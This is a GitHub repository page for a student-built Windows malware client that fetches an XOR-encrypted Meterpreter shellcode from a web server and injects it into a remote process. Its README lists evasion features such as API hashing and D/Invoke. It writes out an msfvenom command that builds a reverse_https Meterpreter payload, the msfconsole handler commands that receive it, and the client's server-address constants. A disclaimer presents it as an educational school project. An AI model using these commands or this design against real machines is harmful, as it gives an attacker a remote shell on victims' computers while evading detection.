Skip to content
/ ICS-Malware-Client Public
forked from dralxs/ICS-Malware-Client

A malware which is able to inject a malicious shellcode into a process

0 stars 1 fork Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

EBMBA/ICS-Malware-Client

BranchesTags
 
 

Repository files navigation

ICS-Malware-Client

Introduction

The main goal of this project is to make a malware which is able to inject a malicious shellcode into a process.
When it started it should spawn a meterpreter for the malicious user to access.

Disclaimer :

This program is developed as a part of a school project.
It is intended for educational purposes only.
Any use of this program for malicious or unauthorized activities is strictly prohibited.
The developer and the institution are not responsible for any misuse of this program.

Features implemented in the program. :

  • D/Invoke ✔️
  • API Hashing ✔️
  • Use only native functions ✔️
  • Get the payload on a web server ✔️
  • Decrypt the payload (XOR) ✔️
  • Execute the payload on a remote process ✔️

Bonus :

  • The payload is not a shellcode ❌
  • The web server configuration is encrypted and decrypted on the fly ✔️
  • Have a web server (in any language) ✔️
  • That encrypts the payload on the fly ✔️
  • That implements checks on the origin of the request via an ID and/or a user agent to be set in the config ✔️
  • Implements a key exchange (not necessarily Diffie-Hellman, it could simply be a POST with the encryption key to use) ✔️

How to use it

Server

First you need to setup the server in order for the malware to work.
Clone the repository : https://github.com/EBMBA/ICS-Malware-Project-Server
In the repository make this command :

msfvenom -p windows/x64/meterpreter/reverse_https LHOST=10.0.2.5 LPORT=443 -f raw -o shellcode.hex

This will generate the shellcode (meterpreter) that we need
Now that you have the shellcode you can start the server, follow these steps :
https://github.com/EBMBA/ICS-Malware-Project-Server#readme

Open a new terminal and start the meterpreter :

  • msfconsole
  • use multi/handler
  • set payload windows/x64/meterpreter/reverse_https
  • set LPORT 443
  • set LHOST 10.0.2.5
  • run

You should have two terminals, one with the meterpreter listening and the other with the webserver started.

Client

First you need to open the solution (.sln)
After we start the webserver and the meterpreter, we need to configure the malware
In the Winhttp-Request.h you need to set two constants :

// IP address and port of the server to change
const LPCWSTR SERVER_IP_ADDRESS = L"10.0.2.5";
const int SERVER_PORT = 5001;

Now you can launch the program.
If all the checks pass, you should be able to access your client machine using the meterpreter.

About

A malware which is able to inject a malicious shellcode into a process

Resources

Readme
Activity

Stars

0 stars

Watchers

0 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages

  • C 86.5%
  • C++ 13.5%